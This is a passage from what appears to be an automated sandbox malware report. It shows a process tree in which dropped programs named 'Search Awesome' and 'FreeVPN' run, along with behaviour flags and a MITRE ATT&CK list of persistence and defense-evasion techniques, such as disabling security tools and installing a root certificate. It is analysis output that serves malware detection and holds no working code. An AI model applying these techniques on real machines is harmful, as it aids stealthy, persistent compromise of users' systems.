- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2800 -ip 28001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6336
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 4892 -ip 48921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1180 -ip 11801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6936 -ip 69361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2268
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:6572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2240
-
C:\Program Files (x86)\Search Awesome\setup.exe"C:\Program Files (x86)\Search Awesome\setup.exe" -svc1⤵
- Executes dropped EXE
PID:5084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4676 -ip 46761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5116
-
C:\Program Files (x86)\FreeVPN\FreeVPN.exe"C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -svc1⤵
- Loads dropped DLL
PID:132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2824 -ip 28241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6260
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39ed855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3024
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Impair Defenses
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1